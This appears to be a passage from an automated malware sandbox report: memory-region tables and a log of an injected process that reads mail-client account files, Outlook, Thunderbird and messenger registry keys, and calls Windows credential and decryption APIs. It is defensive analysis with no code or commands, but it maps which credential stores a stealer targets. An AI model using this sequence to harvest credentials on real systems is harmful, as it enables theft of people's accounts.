| sortdefault.nls | 0x01de0000 | 0x020aefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x021affff | Private Memory | Readable, Writable |
|
|
|
- |
| atl.dll | 0x73e90000 | 0x73ea3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pstorec.dll | 0x73eb0000 | 0x73ebcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x73ed0000 | 0x73f53fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comdlg32.dll | 0x75210000 | 0x7528afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x7d8 | address = 0x400000, size = 114688 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x7d8 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x7d8 | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x7d8 | os_tid = 0x11c, address = 0x0 |
|
1 |
Host Behavior
File (40)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\114E.tmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting_lng.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Roaming\Thunderbird\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Thunderbird | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount | type = size |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount | size = 1506, size_out = 1506 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount | size = 670, size_out = 670 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount | size = 1734, size_out = 1734 |
|
1 | |
| Write | C:\ProgramData\114E.tmp | size = 11 |
|
1 | |
| Write | C:\ProgramData\114E.tmp | size = 1 |
|
12 | |
| Write | C:\ProgramData\114E.tmp | size = 12 |
|
1 | |
| Write | C:\ProgramData\114E.tmp | size = 14 |
|
2 | |
| Write | C:\ProgramData\114E.tmp | size = 5 |
|
1 | |
| Write | C:\ProgramData\114E.tmp | size = 0 |
|
4 | |
| Write | C:\ProgramData\114E.tmp | size = 2 |
|
2 | |
| Write | C:\ProgramData\114E.tmp | size = 4 |
|
2 | |
| Write | C:\ProgramData\114E.tmp | size = 7 |
|
1 |
Registry (97)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\IncrediMail\Identities | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Group Mail | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\MessengerService | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Yahoo\Pager | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} | value_name = Username, data = Main Identity, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 User, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP User, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTP User, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP User, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 User, data = sdjwh@dive.djh, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Server, data = fgerh, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Display Name, data = fvmmeu dufn, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Email, data = sdjwh@dive.djh, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Server, data = hthr, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Port, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Port, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Use SPA, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Password, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTP User, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP User, data = 104, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles | - |
|
1 |
Module (32)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x73ed0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | pstorec.dll | base_address = 0x73eb0000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x74ee0000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x750d0000 |
|
3 | |
| Get Handle | c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe | base_address = 0x400000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitCommonControlsEx, address_out = 0x73ed6be6 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetSpecialFolderPathA, address_out = 0x75aefb26 |
|
1 | |
| Get Address | c:\windows\syswow64\pstorec.dll | function = PStoreCreateInstance, address_out = 0x73eb526c |
|
1 | |
| Get Address | c:\windows\syswow64\crypt32.dll | function = CryptUnprotectData, address_out = 0x74f15a7f |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredReadA, address_out = 0x751171c1 |
|
3 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredFree, address_out = 0x750db2ec |
|
3 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredDeleteA, address_out = 0x75117941 |
|
3 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredEnumerateA, address_out = 0x75117381 |
|
3 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredEnumerateW, address_out = 0x75117481 |
|
3 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Ini (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = AddExportHeaderLine, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = WinPos |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = Columns |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg | section_name = General, key_name = Sort, default_value = 0 |
|
1 |
Process #16: narrowexisting.exe
691
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:41, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2ac |
| Parent PID | 0xa68 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B60
0x
B64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x00220000 | 0x0025bfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| tzres.dll | 0x00260000 | 0x00260fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00267fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
